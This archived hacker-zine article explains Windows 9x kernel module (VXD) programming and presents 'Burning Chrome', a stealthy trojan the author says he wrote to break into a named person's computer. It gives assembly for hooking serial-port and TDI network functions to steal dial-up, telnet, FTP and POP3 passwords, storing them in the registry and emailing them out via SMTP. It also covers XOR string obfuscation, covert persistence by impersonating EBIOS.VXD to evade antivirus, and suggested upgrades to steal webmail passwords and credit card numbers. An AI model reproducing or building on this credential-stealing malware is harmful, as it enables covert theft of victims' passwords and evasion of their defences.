home *** CD-ROM | disk | FTP | other *** search
/ Hacker's Arsenal - The Cutting Edge of Hacking / Hacker's Arsenal - The Cutting Edge of Hacking.iso / texts / misc / vxd.txt < prev    next >
Encoding:
Text File  |  2001-07-11  |  92.3 KB  |  2,646 lines

  1. ----------------------[  Attacking Windows 9x with Loadable Kernel Modules  ]
  2.  
  3.  
  4. --------[  Solar Eclipse <solareclipse@phreedom.org>  ]
  5.  
  6.  
  7. ----[  Introduction
  8.  
  9. This article explains the basics of Windows 9x kernel modules development and
  10. contains the full source of a loadable kernel module (LKM) that performs the
  11. following functions:
  12.  
  13. 1) it captures TCP connections traffic and extracts telnet/pop3/ftp passwords
  14. 2) it captures dial-up connections traffic (by capturing the raw data from the
  15.    serial port) and extracts dial-up passwords
  16. 3) by accessing the TCP stack directly (bypassing the Winsock interface), it
  17.    emails all the collected authentication information to an evil script
  18.    kiddie sitting in a basement full of stolen hardware
  19. 4) it is virtually undetectable with any standard Windows tools
  20. 5) it is written entirely in assembly and the executable file size is
  21.    only 7KB
  22.  
  23. The name of the LKM is Burning Chrome. I wrote it because I had to break into
  24. a computer system owned by a girl called Chrome. Yes, I know it sounds lame.
  25. No, I don't know who William Gibson is. Dude, what is the Matrix?
  26.  
  27. I assume that you have a basic knowledge of Win32 programming, x86 protected
  28. mode architecture, 32-bit assembly language programming, SoftIce and basic
  29. Internet protocols (telnet/pop3/ftp/smtp).
  30.  
  31. I will start this article with a short overview of the Windows 9x kernel
  32. design. Then I will describe a template kernel module and will talk about some
  33. of the system services that Windows provides. Finally I will give you the
  34. Burning Chrome source.
  35.  
  36. ----[  Windows 9x Internals
  37.  
  38. Windows 9x has two separate layers of code: DLL layer and VXD layer.
  39.  
  40. 1) DLL Layer
  41.  
  42. The DLL layer consists of all system DLLs. It runs as a Ring 3 code. All the
  43. API functions that Windows programs normally call are implemented in the DLL
  44. layer (in KERNEL32.DLL, USER32.DLL, GDI32.DLL and other DLLs). Many of the
  45. DLLs call VXD functions. Some of the API functionality is implemented entirely
  46. in the VXD layer and the DLL functions act only as gates (this is the case
  47. with the registry access functions). Calling DLL functions from the VXD layer
  48. is impossible and this makes most of the Windows API inaccessible to kernel
  49. modules.
  50.  
  51. I will not discuss the system DLLs any more, because they are not used for
  52. Windows kernel hacking.
  53.  
  54. 2) VXD Layer
  55.  
  56. The general term VXD stands for Virtual Device Driver, the "x" being a
  57. placeholder for device names. For example, VKD is a Virtual Keyboard Driver,
  58. VDD is a Virtual Display Driver, etc. The VXD layer is the core of the Windows
  59. OS. It is similar to the Linux kernel and the functions it provides, although
  60. it is not nearly as well documented. The VXD code handles memory management,
  61. task switching, low-level hardware access and other similar tasks. The core OS
  62. services, such as registry access, networking and file access are also
  63. implemented in the VXD layer.
  64.  
  65. All VXDs run in Ring 0 and have full access to the system. Hacking the Windows
  66. kernel is possible by writing an VXD.
  67.  
  68. The Windows Driver Development Kit (DDK) is used for writing VXDs. Most
  69. programmers shiver when somebody mentions 'device drivers', but but the VXDs
  70. can be used for many other purposes. Let me quote Andrew Schulman, the author
  71. of "Unauthorized Windows95. A Developer's Guide to Exploring the Foundations
  72. of Windows 95":
  73.  
  74.      "...Seen  from  this  perspective,  the  names  Virtual Device Driver and
  75.      Device  Driver  Kit  are  unfortunate.  They  automatically turn off most
  76.      Windows developers, who quite sensibly feel that device-driver writing is
  77.      an  area  they  would rather stay away from. More appropriate names would
  78.      have been "TSRs for Windows" or "Please Hack Our Operating System". As it
  79.      is,  the  names VXD and DDK alienate many programmers who would otherwise
  80.      jump at this stuff.
  81.  
  82.      ...Admittedly,  very  few Windows programmers will be using VXDs to write
  83.      hardware  interrupt  handlers  or  device drivers. But a short time spent
  84.      with  the  DDK  should  convince  you  that  there's  a ton of documented
  85.      functionality available to VXDs that is otherwise difficult or impossible
  86.      to  get  under  Windows.  Whenever  a  programmer  says that something is
  87.      "impossible"  in  Windows,  I  suspect  the  correct reply will be "No it
  88.      isn't.  Write  a  VXD"  Just  as  TSRs  allowed DOS programmers to do the
  89.      otherwise-impossible  in  the  1980s,  VXDs  are  going  to  let  Windows
  90.      programmers go anywhere and do anything in what's left of the 1990s."
  91.  
  92. Unfortunately (or maybe fortunately) writing VXDs for Windows has not become
  93. as common as writing TSRs for DOS was. The possibilities that the Virtual
  94. Device Drivers offer are big, but writing one is not an easy task.
  95.  
  96. ----[  Your First VXD
  97.  
  98. VXDs are usually written with the Windows98 DDK, which includes a copy of the
  99. Microsoft Macro Assembler (MASM). It is possible to use C for VXD development,
  100. but using assembly is definitely more fun. Other tools, such as NuMega
  101. DriverWorks make the programmer's job easier, but for this example I will use
  102. only the Win98 DDK. The DDK is available for free download on Microsoft's web
  103. site. Even if they take it down, you will be able to find it on some old copy
  104. of the MSDN or on the net.
  105.  
  106. Having a copy of the Windows NT4 DDK, Windows 2000 DDK and even the Windows
  107. 3.11 DDK will also be nice. Many interesting VXD features are poorly
  108. documented or not documented at all. Although the Windows 98 DDK will be your
  109. primary source of information, sometimes you will find the information you
  110. need in some of the other kits. The Windows 3.11 DDK is useful, because there
  111. are a lots of similarities in the internal architecture of Windows 3.11 and
  112. Windows 95. (Contrary to the Microsoft hype, Windows 3.11 was closer to
  113. Windows 95 than to Windows 3.1. Basically the only major change between 3.11
  114. and 95 was the GUI)
  115.  
  116. The VXDs are LE executables. You need a special linker to link them (included
  117. in the DDK).
  118.  
  119. The following source is a template for a very basic VXD. It's just an example
  120. for a module that can be successfully loaded by the system.
  121.  
  122. <++> example.asm
  123.  
  124.   ; EXAMPLE.ASM
  125.  
  126.   ; VXDs use 386 protected mode
  127.  
  128.   .386p
  129.  
  130.   ; Many system VXDs export services, just like the system DLLs in Windows.
  131.   ; We can use these services for memory allocations, registry and file
  132.   ; access, etc.
  133.   ; All we need to do is include the appropriate include file. There are
  134.   ; many INC files for the system VXDs that come with the DDK.
  135.   ; VMM.INC is the only required include file. It contains the declarations
  136.   ; for many important services exported by VMM32.VXD, as well as many
  137.   ; macros that are used for VXD programming.
  138.  
  139.   INCLUDE VMM.INC
  140.   ; All VXDs need a Driver Declaration Block (DDB), that stores information
  141.   ; about its name, version, control procedure, device ID, init order, etc.
  142.   ; To build this DDB use the Declare_Virtual_Device macro with the following
  143.   ; parameters:
  144.   ;   - VXD name (needs not be the same as the file name)
  145.   ;   - Major version
  146.   ;   - Minor version
  147.   ;   - Control procedure (similar to WndProc in normal Windows programs. This
  148.   ;     procedure receives all the system messages and processes them
  149.   ;   - Device ID - used only for VXDs that export services. Arbitrary values
  150.   ;     might work as long as they donÆt conflict with the official Device IDs
  151.   ;     assigned by Microsoft
  152.   ;   - Init order - 32 bit integer, determines the order in which the VXDs
  153.   ;     are loaded. If you want your VXD to be loaded after some other VXD,
  154.   ;     use a value greater than the other VXD's init order
  155.  
  156.   Declare_Virtual_Device EXAMPLE, 1, 0, Control_Proc, Undefined_Device_ID, \
  157.   Undefined_Init_Order, , ,
  158.  
  159.   ; This macros declares the data segment
  160.  
  161.   VxD_DATA_SEG
  162.  
  163.   SomeData        dd 0    ; Just some data
  164.  
  165.   VxD_DATA_ENDS
  166.  
  167.   ; Code segment
  168.  
  169.   VxD_CODE_SEG
  170.  
  171.   BeginProc      SomeProcedure
  172.  
  173.           push eax
  174.           mov eax, 1
  175.           pop eax
  176.  
  177.           ret
  178.  
  179.   EndProc        SomeProcedure
  180.  
  181.   VxD_CODE_ENDS
  182.  
  183.   ;Locked code segment - will be explained later
  184.  
  185.   VxD_LOCKED_CODE_SEG
  186.  
  187.   ; This is the control procedure. It should use Control_Dispatch macros for
  188.   ; handling the messages. This macro takes 2 parameters - message_code and
  189.   ; handler address. You can find a list of all the messages in the DDK
  190.   ; documentation.
  191.   ; This example only handles the Device_Init message and calls the
  192.   ; Do_Device_Init function.
  193.  
  194.   BeginProc       Control_Proc
  195.           Control_Dispatch Device_Init, Do_Device_Init
  196.           clc
  197.           ret
  198.   EndProc         Control_Proc
  199.  
  200.   VxD_LOCKED_CODE_ENDS
  201.  
  202.   ; Init code segment
  203.  
  204.   VxD_ICODE_SEG
  205.  
  206.   ; This procedure is called after the VXD is loaded. Put the initialization
  207.   ; code in it.
  208.  
  209.   BeginProc       Do_Device_Init
  210.  
  211.   ; Put some init code here...
  212.  
  213.           ret
  214.   EndProc         Do_Device_Init
  215.  
  216.   VxD_ICODE_ENDS
  217.  
  218.   ; End of EXAMPLE.ASM
  219.  
  220.           END
  221.  
  222. <-->
  223.  
  224.     There are 7 different types of segments that your VXD can use.
  225.  
  226.   1) VxD_DATA_SEG and VxD_CODE_SEG - for pageable code and data
  227.  
  228.   2) VxD_LOCKED_DATA_SEG i VxD_LOCKED_CODE_SEG - this segments contain
  229.      non-pageable code and data. Control_Proc and the interrupt handlers
  230.      should be in VxD_LOCED_CODE_SEG. I am not quite sure about the
  231.      rest of the code. The Windows DDK documentation is not very clear about
  232.      that. If your VXD is small, you might want to use only non-pageable
  233.      memory, just to be safe.
  234.  
  235.   3) VxD_ICODE_SEG i VxD_IDATA_SEG - initialization code and data. These
  236.      segments are discarded after the initialization is finished. This is a
  237.      good place for the Do_Device_Init procedure.
  238.  
  239.   4) VxD_REAL_INIT_SEG - The code in this segment is executed by Windows
  240.      before the processor switches to protected mode. Unless you are writing a
  241.      REAL device driver, it's pretty much useless.
  242.  
  243. To compile the example VXD you will also need a .DEF file. This is
  244. EXAMPLE.DEF:
  245.  
  246. <++> example.def
  247.  
  248.  LIBRARY  EXAMPLE
  249.  
  250.  DESCRIPTION 'VxD Example by Solar Eclipse'
  251.  
  252.  EXETYPE  DEV386
  253.  
  254.  SEGMENTS
  255.         _LTEXT PRELOAD NONDISCARDABLE
  256.         _LDATA PRELOAD NONDISCARDABLE
  257.         _ITEXT CLASS 'ICODE' DISCARDABLE
  258.         _IDATA CLASS 'ICODE' DISCARDABLE
  259.         _TEXT  CLASS 'PCODE' NONDISCARDABLE
  260.         _DATA  CLASS 'PCODE' NONDISCARDABLE
  261.  
  262.  EXPORTS
  263.         EXAMPLE_DDB  @1
  264.  
  265. <--> example.def
  266.  
  267. If your DDK is set up correctly, and all the shell variables are initialized
  268. (read the DDK docs for that), you should be able to compile EXAMPLE.VXD with
  269. the following commands (no Makefile, sorry):
  270.  
  271. You can compile a DEBUG version with this:
  272.  
  273.     set ML=-coff -DBLD_COFF  -DIS_32 -nologo -W3 -Zd -c -Cx -DWIN40COMPAT -
  274. DMASM6 -DINITLOG -DDEBLEVEL=0 -Fl
  275.     ml example.asm
  276.  
  277. NO_DEBUG version:
  278.  
  279.     set ML=-coff -DBLD_COFF  -DIS_32 -nologo -W3 -Zd -c -Cx -DWIN40COMPAT -
  280. DMASM6 -DINITLOG -DDEBLEVEL=1 -DDEBUG -Fl
  281.     ml example.asm
  282.  
  283. Then link it:
  284.  
  285.     link example.obj /vxd /def:example.def
  286.  
  287. Put the file EXAMPLE.VXD in C:\WINDOWS\SYSTEM and add the following to the
  288. [386Enh] section of SYSTEM.INI
  289.  
  290.     device=example.vxd
  291.  
  292. After the system is rebooted, the VXD will be loaded. Of course it won't do
  293. much, but you can see it in the VXD list with SoftIce.
  294.  
  295. ----[  Burning Chrome
  296.  
  297. The VXDs allow you to access most of the core Windows services directly and
  298. this gives you some interesting possibilities. Let's explore the features
  299. implemented in CHROME.ASM.
  300.  
  301. I. Capturing dial-up passwords
  302.  
  303. Almost all dial-up connections are initiated through a modem attached to a
  304. serial port, using the PPP protocol. The two most common ways of
  305. authentication are via PAP (Password Authentication Protocol) or via a login
  306. prompt. To get these passwords we need to capture the traffic passing through
  307. the serial port.
  308.  
  309. The Hook_Device_Service system call allows us to hook the services exported by
  310. the VXDs. VCOMM.VXD exports three services that we need to hook. These are
  311. VCOMM_OpenComm, VCOMM_WriteComm and VCOMM_CloseComm. The following code
  312. hooks the services:
  313.  
  314.         ; Hook VCOMM services
  315.  
  316.         GetVxDServiceOrdinal eax, _VCOMM_OpenComm
  317.         mov esi, offset32 OpenComm_Hook
  318.         VMMcall Hook_Device_Service
  319.         jc Abort
  320.  
  321.         GetVxDServiceOrdinal eax, _VCOMM_WriteComm
  322.         mov esi, offset32 WriteComm_Hook
  323.         VMMcall Hook_Device_Service
  324.         jc Abort
  325.  
  326.         GetVxDServiceOrdinal eax, _VCOMM_CloseComm
  327.         mov esi, offset32 CloseComm_Hook
  328.         VMMcall Hook_Device_Service
  329.         jc Abort
  330.  
  331. OpenComm_Hook, WriteComm_Hook and CloseComm_Hook are the names of the new
  332. service handlers.
  333.  
  334. One of the OpenComm parameters is the name of the device being opened. When a
  335. dial-up connection is established, Windows opens COM1, COM2, COM3 or COM4 and
  336. sends the AT modem commands. Our OpenComm procedure checks the device name and
  337. sets a flag if it is a COM port. All the subsequent WriteComm calls are
  338. logged, until the connection is closed.
  339.  
  340. If the flag is set, the WriteComm procedure saves all the data to a buffer.
  341. When the buffer gets full, the data in it is processed and saved to the
  342. registry.
  343.  
  344. The main goal of the log processing routines is to make sure that no
  345. username/password combination is emailed twice - getting your mailbox flooded
  346. by a misbehaving trojan horse is not good. This requires the usernames and
  347. the passwords to be saved and each new connection to be checked against the
  348. old sessions. The best place for storing such information is the registry.
  349. Reading and writing to the registry is much easier than storing the data in a
  350. file on the hard disk. The chance of the user noticing a few new entries in
  351. the registry is also very slim.
  352.  
  353. For each session, four things need to be saved: username, password, phone
  354. number or IP address of the remote end and the log itself. Before the session
  355. is saved, the username, password and the phone number are extracted from the
  356. log and compared to the existing values in the registry. If a session with the
  357. same values exists, the new session is not saved.
  358.  
  359. CHROME.ASM combines the username, password and phone number into a single
  360. string. Then it saves the session to the registry using this string as the key
  361. name and the log as the key value. The string acts as a hash of the log. When
  362. a new connection is captured, its hash string is generated and the VXD checks
  363. if a key with the same hash exists. It does this by trying to open a key with
  364. the same name as the hash string. If the RegQueryValueEx call fails, the new
  365. connection is saved.
  366.  
  367.         ; The following code is taken from the Send_Common procedure
  368.  
  369.         ; ValueName is pointer to the beginning of the hash string.
  370.         ; pBuffer is a pointer to the log
  371.         ; RegQueryValueEx expects a pointer to a pointer, so dwTemp_1 is used
  372.         ; for passing a pointer to a NULL pointer
  373.  
  374. Get_Reg_Value:
  375.         ; Try to get the value with the same name
  376.  
  377.         xor ebx, ebx
  378.         mov dwTemp_1, ebx
  379.         push offset32 dwTemp_1          ; cbData
  380.         push ebx                        ; lpszData
  381.         push ebx                        ; fdwType
  382.         push ebx                        ; dwReserved
  383.         push ValueName                  ; lpszValueName
  384.         push hOurKey                    ; phKey
  385.  
  386.         VMMCall _RegQueryValueEx        ; Get the value of the key
  387.         add esp, 18h
  388.  
  389.         cmp eax, ERROR_FILE_NOT_FOUND   ; If key exists
  390.         jne Send_Common_Abort
  391.  
  392.         ; Save the result in the registry
  393.  
  394.         push BufferSize                 ; cbData
  395.         push pBuffer                    ; lpszData
  396.         push REG_SZ                     ; fdwType
  397.         push 0                          ; dwReserved
  398.         push ValueName                  ; lpszValueName
  399.         push hOurKey                    ; phKey
  400.  
  401.         VMMCall _RegSetValueEx          ; Set the value of the key
  402.         add esp, 18h
  403.  
  404. When the user ftp's to a server his connection is logged. If later he decides
  405. to telnet to the same server with the save username and password, the telnet
  406. connection will not be saved, because the hash string will be the same. To
  407. avoid this we will include an connection type identifier in the hash string.
  408. This identifier is a single letter put in the beginning of the hash string:
  409.  
  410.         TraceLetters            equ $  ; Table with letters for each different
  411.         NOTHING                 db 'N' ; type of trace. Indexed with TraceType
  412.         MODEM                   db 'M'
  413.         TELNET                  db 'T'
  414.         FTP                     db 'F'
  415.         POP3                    db 'P'
  416.  
  417. The buffer processing functions for the dial-up and the TCP connections are
  418. very similar. They only differ in the way the hash string is extracted from
  419. the log. The common buffer processing is done by the Send_Common function. It
  420. saves the new data in the buffer and checks if it is full. Usually we don't
  421. need to capture more than the first hundred bytes to get the username and
  422. password. If the buffer is full, the log should be processed. The TraceType
  423. variable contains the connection type - modem, telnet, ftp or pop3.
  424. Send_Common calls the appropriate log processing function - in the case of a
  425. dial-up connection it calls ModemLog. The log processing functions extract a
  426. hash string from the buffer and returns it to Send_Common.
  427.  
  428. ModemLog checks the captured data for an ATD command. If does not find it, an
  429. error flag is set and the data is not saved into the registry. Else the
  430. phone number is extracted and copied as the first part of the hash string.
  431.  
  432. If the first transferred byte after the phone number is a '~' we are dealing
  433. with a PPP connection. During the PPP connection establishment authentication
  434. information can be exchanged. The most commonly used protocol is called PAP
  435. (Password Authentication Protocol). CHAP (Challenge Authentication Protocol)
  436. is also popular, but it does not send the password in cleartext and therefor
  437. can not be captured by the VXD.
  438.  
  439. You can find more information on PAP in RFC1172: The Point-to-Point Protocol
  440. Initial Configuration Options. The PPP protocol is described in RFC1331.
  441.  
  442. The PAP authentication information is transmitted using a PPP packet with a
  443. PAP sub-packet type. The structure of the PAP packet is shown in the
  444. following table:
  445.  
  446.   | 7E | C0 23 | 01 | xx | xx xx |  ULen  | U S E R |  PLen  | P A S S |
  447.   |    |       |    |    |       |        |         |        |         |
  448.   |PPP |  PAP  |code| id |length |user len|username |pass len|password |
  449.  
  450. All PAP packets start with 7E C0 23. If the packet is carrying authentication
  451. information the PAP code is 01. We need to scan the captured PPP session for
  452. the 7E C0 23 01 byte sequence and copy the username and the password to hash
  453. string.
  454.  
  455. If the first character after the phone number is not '~', we are dealing with
  456. a login prompt configuration. Usually the user enters a username, presses
  457. Enter, then enters the password, presses Enter again and the PPP connection is
  458. established. As we already know, the first byte of the PPP handshake sequence
  459. is '~'. If we copy all the data before the '~' to the hash string we'll surely
  460. get the username and the password.
  461.  
  462. II. Capturing TCP connections
  463.  
  464. Everybody reading this is probably familiar with the Winsock interface. What
  465. most of you don't know is that most of the Winsock functions are implemented
  466. in the Transport Data Interface (TDI). This is a kernel mode interface for
  467. network access, supporting different network protocols. WINSOCK.DLL is just a
  468. convenient way for the Windows applications to use this interace without
  469. calling the VTDI.VXD services directly.
  470.  
  471. Among others the TDI interface provides the functions TdiConnect,
  472. TdiDisconnect and TdiSend. They correspond directly to the Winsock functions
  473. connect(), disconnect() and send(). We need to hook these functions and
  474. intercept the data being sent. There is no documented way for hooking these
  475. functions, but it's not impossible. The VTDI_Get_Info system call returns a
  476. pointer to the TdiDispatchTable, which contains pointers to all the TDI
  477. functions. The applications that use TDI are supposed to get the addresses
  478. from this table and call the TDI functions directly. If we get the address of
  479. this table and replace the addresses of the TDI functions with the addresses
  480. of our hooks, all the TDI calls will get routed to us. Our code runs in Ring 0
  481. and we have full access to the memory and can change whatever we want. Of
  482. course we need to save the addresses of the old handlers so that we can call
  483. them later. Sounds just like hooking DOS interrupt handlers, doesn't it?
  484.  
  485. Here is the code for hooking the TDI functions:
  486.  
  487.         ; Make sure VTDI is present
  488.  
  489.         VxDcall VTDI_Get_Version
  490.         jc Abort
  491.  
  492.         ; Get a pointer to the TCP dispatch table
  493.  
  494.         push offset32 TCPName
  495.         VxDcall VTDI_Get_Info
  496.         add esp, 4
  497.  
  498.         mov TdiDispatchTable, eax       ; Save the address of TdiDispatchTable
  499.  
  500.         ; Hook TdiCloseConnection, TdiConnect, TdiDisconnect and TdiSend
  501.  
  502.         mov ebx, [eax+0Ch]
  503.         mov TdiCloseConnection_PrevAddr, ebx
  504.         mov [eax+0Ch], offset32 TdiCloseConnection_Hook
  505.  
  506.         mov ebx, [eax+18h]
  507.         mov TdiConnect_PrevAddr, ebx
  508.         mov [eax+18h], offset32 TdiConnect_Hook
  509.  
  510.         mov ebx, [eax+1Ch]
  511.         mov TdiDisconnect_PrevAddr, ebx
  512.         mov [eax+1Ch], offset32 TdiDisconnect_Hook
  513.  
  514.         mov ebx, [eax+2Ch]
  515.         mov TdiSend_PrevAddr, ebx
  516.         mov [eax+2Ch], offset32 TdiSend_Hook
  517.  
  518. The TDI documentation in the Windows DDK is incomplete and very confusing, but
  519. it's the only available source of information.
  520.  
  521. TdiConnect is passed a pointer to a RequestAddress structure, which contains a
  522. pointer to a RemoteAddress structure, which contains the IP address and the
  523. port number. After making sure that the RequestAddress is of type IPv4, our
  524. TdiConnect handler checks the destination port number. If it is 21, 23 or 110
  525. we need to capture this connection. We need to set the TraceType flag and save
  526. the connection handle. Unfortunately this connection handle is not returned
  527. directly by the original TdiConnect function. One of its parameters is the
  528. address of a callback function which is to be called after the connection is
  529. established (or when an error occurs). We will save the supplied address of
  530. the callback function and replace it with the address of TdiConnect_Callback
  531. function in the VXD. This function checks the connection status. If the
  532. connection is successfully established, the connection handle is saved. If
  533. not, the TraceType flag is unset. After that the real callback function is
  534. called.
  535.  
  536. TdiSend is very similar to WriteComm. It checks the connection handle and if
  537. it matches the connection that we are currently tracing TdiSend calls
  538. SendCommon. From there on the process is exactly the same as described above.
  539.  
  540. If we are tracing a pop3 session, SendCommon calls Pop3Log as a log processing
  541. function. Pop3Log converts the IP address of the server to a hex string and
  542. saves it as the first part of the hash. This makes sure that two accounts with
  543. the same username/password on different servers will not get confused. Then
  544. the log is scanned for the USER and PASS commands. The username and password
  545. are extracted and stored in the hash string.
  546.  
  547.         mov esi, pBuffer
  548.         mov ecx, BufferSize
  549.         mov ebx, ecx
  550.  
  551.         mov eax, 'RESU'                 ; Search for USER
  552.  
  553. USER_or_PASS_Loop:
  554.         cmp dword ptr [esi], eax        ; Search for USER or PASS (in eax)
  555.         je USER_or_PASS_Copy_Loop_Start
  556.  
  557.         inc esi
  558.         dec ecx
  559.         jz Pop3Log_Abort
  560.         jmp USER_or_PASS_Loop
  561.  
  562. USER_or_PASS_Copy_Loop_Start:
  563.         add esi, 5                      ; Skip 'USER' and 'PASS'
  564.  
  565. USER_or_PASS_Copy_Loop:
  566.         cmp byte ptr [esi], 0Dh         ; Is <CR> here?
  567.         jne Copy_USER_or_PASS
  568.  
  569.         cmp al, 'P'                     ; Is this a PASS copy?
  570.         je Pop3Log_End                  ; Work done, finish log processing
  571.  
  572.         mov ax, 0A0Dh                   ; Save a <CR> between username & pass
  573.         stosw
  574.  
  575.         mov eax, 'SSAP'
  576.         jmp USER_or_PASS_Loop
  577.  
  578. Copy_USER_or_PASS:
  579.         movsb
  580.         dec ecx
  581.         jz Pop3Log_Abort
  582.         jmp USER_or_PASS_Copy_Loop
  583.  
  584. This code is shown here only as a prove that programming in assembly is
  585. a very brain damaging activity. After spending several years doing assembly
  586. language programming, you'll never programmer the same way as before, even in
  587. a high level language. Whether this is good or bad is a different question.
  588.  
  589. The FTP protocol is very similar to the POP3 protocol. In fact the
  590. authentication commands (USER & PASS) are exactly the same and FtpLog can
  591. simply call Pop3Log. We don't want to capture all the anonymous ftp
  592. connections and that's why FtpLog checks the username. If it is 'anonymous',
  593. the connection trace is aborted.
  594.  
  595. All telnet logs are processed by the TelnetLog function. It is a little bit
  596. more complicated because the Telnet client negotiates the terminal options
  597. with the server before it lets the user type his username and password. The
  598. algorithm for the username/password extraction is as follows:
  599.  
  600. DATA: terminal options | 0 | username | CR | password | CR | more data
  601.  
  602. 1) find the first CR
  603. 2] find the second CR
  604. 3) save the second CR position
  605. 4) search for the 0 (going back from the second CR)
  606. 5) stop when 0 is found or the beginning of the buffer is reached
  607. 6) copy everything from the current position (starting after the \0 or
  608.    at the beginning of the buffer) to the position of the second CR
  609.  
  610. While writing this article I went through my code once again and found the
  611. following comment:
  612.  
  613.         ; If NULL is found, edi points to the byte before it and we need to do
  614.         ; inc edi twice. Else, edi would point to the first char in the buffer
  615.         ; and we don't need to inc it.
  616.         ; That's why we have done 'inc ecx' twice a couple of lines before.
  617.         ; This way, if NULL is not found, edi points to the first-2 char
  618.         ; and we can (and must) do inc edi two times.
  619.  
  620.         inc edi
  621.         inc edi
  622.  
  623. This shows that writing code at 3am is not very healthy.
  624.  
  625. III. Emailing the captured passwords
  626.  
  627. Sending the captured passwords back to the hacker is very important. The
  628. mailing function needs to be robust, otherwise all the password capturing code
  629. is useless.
  630.  
  631. The mailing function needs to be called only when an Internet connection is
  632. present. We could use our COM port hook and find out when a PPP connection is
  633. established, but this wouldn't work for machines with Ethernet connections.
  634. The simplest thing do is to make our TdiConnect handler call the Sendmail
  635. function everytime an outgoing connection on port 80 is detected. In this day
  636. and age, everybody uses the Web. A connection to a web server is a clear
  637. indication that an Internet connection is also present. If this is not the
  638. case (the user might be using a local web server or an Intranet without
  639. external connectivity) the Sendmail function will fail connecting and retry
  640. again the next time.
  641.  
  642. When new data is saved to the registry, a flag is set. The letter 'P' is saved
  643. as the default value of the registry key. This flag is later checked by the
  644. mailing function and the captured passwords are emailed if it is set. After
  645. the email is sent the default value is deleted from the registry. This way an
  646. email is sent only when there is a new password. It is better to send all the
  647. passwords every single time than to send only the new one. This way if one
  648. email is lost, there is still a chance of getting the lost password the next
  649. time.
  650.  
  651. Sendmail uses TDI to connect to a mail server and send all the captured
  652. passwords and logs. Before a connection is established, a message buffer is
  653. allocated from the heap. This buffer is used for constructing the sequence of
  654. SMTP commands and email data before sending it to the mailserver. First some
  655. SMTP commands are copied to the buffer:
  656.  
  657. HELO localhost
  658. MAIL FROM:<xxx@xxx.com>
  659. RCPT TO:<xxx@xxx.com>
  660. DATA
  661.  
  662. Then the email message is constructed. The subject of the message is set to
  663. the RegisteredOwner value from
  664. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion.
  665. The first 3 lines from the message contain RegisteredOrganization, SystemRoot
  666. and VersionNumber - for statistical purposes only.
  667.  
  668. As you already know, our logs are stored as values in a registry key. The
  669. Sendmail function enumerates these values and copies them to the mail buffer.
  670. The email text is finished with '.' and the QUIT command is put into the
  671. buffer.
  672.  
  673. Opening a TDI connection and sending the contents of the mail buffer is pain
  674. in the ass. We need to open an address object (TdiOpenAddress), save the
  675. returned address handle, open a connection object (TdiOpenConnection), save
  676. the connection context, associate the connection context with the address
  677. handle (TdiAssociateAddress) and then finally call TdiConnect. Of course the
  678. documentation does not mention any of these steps or the order in which they
  679. have to be performed. Figuring this out with SoftIce is not fun.
  680.  
  681. Most TDI functions are asynchronous and call the TdiMail_Callback function on
  682. completion. TdiConnect is no exception. TdiMail_Callback checks the error code
  683. and if the connection is established correctly it sends the contents of the
  684. mail buffer. Sending all the commands with one write is not allowed by the
  685. SMTP protocol, but it works with most mail servers. After the sending the
  686. TdiMail_Callback is called again, this time because the send was completed.
  687. The connection is then closed by calling TdiDisconnect and TdiCloseAddress.
  688.  
  689. The default value of our reg key is deleted, thus unsetting the flag. The next
  690. time Sendmail is called it will not send anything, unless a new password was
  691. captured.
  692.  
  693.         ; Delete the default value (send is done)
  694.  
  695.         xor eax, eax
  696.         push eax                        ; cbData
  697.         push offset32 Zero              ; lpszData
  698.         push REG_SZ                     ; fdwType
  699.         push eax                        ; lpSubKey
  700.         push hOurKey
  701.  
  702.         VMMCall _RegSetValue
  703.         add esp, 14h
  704.  
  705. IV. Misc
  706.  
  707. All the ASCII data in CHROME.VXD is XOR-ed with 42. This is not a storing
  708. encryption scheme, but it will fool a less experienced observer.
  709.  
  710.         mov edi, ASCIIStart
  711.         mov ecx, ASCIILength
  712.  
  713. Decode_Loop:                            ; Why 42...? :-)
  714.         xor byte ptr [edi], 42
  715.         inc edi
  716.         loop Decode_Loop
  717.  
  718. The installation process of Burning Chrome is really interesting. The standard
  719. installation approach for VXDs is to copy them to C:\WINDOWS\SYSTEM and add
  720. the appropriate entry in the registry or in the SYSTEM.INI file. Modifying the
  721. registry or INI files can be easily detected and should be avoided.
  722.  
  723. The core Windows VXDs are compressed into a single file, called VMM32.VXD.
  724. This is not a normal VXD file. When the system loads it during the boot
  725. process, all the files that are contained in it are extracted and loaded as
  726. kernel modules. The file format of the VMM32.VXD is documented and it is
  727. possible to add VXD files to it. Unfortunately, registry entries are still
  728. required for these files and we can not force the system to load our module
  729. without modifying the registry. The C:\WINDOWS\SYSTEM\VMM32 folder has a
  730. special function. Every time a VXD from the VMM32.VXD collection is loaded,
  731. Windows checks if a file with the same name exists in this directory. If it
  732. finds a file with the same name, it is loaded instead of the VXD in
  733. VMM32.VXD.
  734.  
  735. Suppose that a AAA.VXD is in VMM32.VXD. If we name our VXD AAA.VXD and put it
  736. in C:\WINDOWS\SYSTEM\VMM32, then Windows will load our module instead of
  737. the original VXD.
  738.  
  739. The only problem is that we need a VXD that is in VMM32.VXD and is loaded by
  740. default, but not necessary needed. The perfect VXD is EBIOS.VXD. EBIOS is a
  741. failed BIOS extention standard by IBM. Most modern computers use
  742. Award/Phoenix/AMI BIOSes and do not support EBIOS. The lack of this VXD will
  743. not be fatal.
  744.  
  745. All we have to do is name our VXD EBIOS.VXD and copy it to
  746. C:\WINDOWS\SYSTEM\VMM32. We don't need to modify any existing system files.
  747. Most anti-virus programs will alert the user if a program is trying to write
  748. to SYSTEM.INI or modify system files, but they will happily let us copy a
  749. file.
  750.  
  751. IV. Known Bugs
  752.  
  753. There are many bugs in this code. If you fix or add something, please send me
  754. a copy :-)
  755.  
  756. Here is the list of the known bus:
  757.  
  758. 1) Sometimes the Sendmail function fails to send the email. It should be
  759. redesigned to comply to the RFC - send a command, wait for a reply, send the
  760. next command, wait for a reply, etc.
  761.  
  762. 2) Anonymous FTP sessions are logged, although they should not be. I have no
  763. clue why.
  764.  
  765. 3) The TelnetLog function includes some Telnet options in the hash string.
  766.  
  767. V. Improvements
  768.  
  769. Here is a list of improvements that can be added to the code. Unfortunately I
  770. have no time to do it. If you modify the code, please send me a copy.
  771.  
  772. 1) Add encryption to the email messages. Even a simple XOR will be better than
  773. sending everything in cleartext.
  774.  
  775. 2) Capture HTTP form submissions and look for webmail passwords/credit card
  776. numbers/etc.
  777.  
  778. 3) Hide the registry key that we use to store our data. The RegEnumKey
  779. function returns the names of the subkeys of a given key. We can hook it and
  780. check the name of the returned key. If it matches the key name that we want to
  781. hide, we'll return an error.
